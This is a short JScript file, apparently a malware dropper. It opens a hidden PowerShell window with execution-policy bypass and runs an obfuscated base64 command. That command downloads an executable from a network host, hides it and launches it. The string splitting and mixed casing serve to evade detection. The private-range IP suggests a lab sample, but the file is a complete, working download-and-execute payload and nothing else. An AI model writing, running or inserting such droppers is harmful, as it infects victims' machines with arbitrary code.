a=new ActiveXObject('Wscript.Shell');
Z="pOwersHeLL -nOp ";
U="-w hIDDen "; 
Y = "-exEc BypASs "; 
X = "-e aQAiACIAVwAiACIAcgAgACgAJwBoAHQAJwArACcAdABwADoALwAvACcAKwAnADEAOQAyAC4AMQA2ADgALgA1ADYALgAxADAANAA6ADgAMAAwADAALwBzAGUAbgBwAHkAbQBhAGwAJwApACAALQBVAHMARQBCAGEAcwBJAEMAUABhAHIAcwBJAE4AZwAgAC0ATwB1AFQARgBpAEwARQAgAGwAYQAiACIAbABhAC4AZQB4ACIAIgBlADsAYQB0AGAAVABSAGkAQgAgACsAaAAgAGwAYQAiACIAbABhAC4AZQB4ACIAIgBlADsAUwB0AGEAIgAiAFIAVAAtACIAIgBwAFIAIgAiAG8AYwBlACIAIgBTAFMAIABsAGEAIgAiAGwAYQAuAGUAeAAiACIAZQA7AA==";
D=Z+U+Y+X
a.Run(D,1,true);
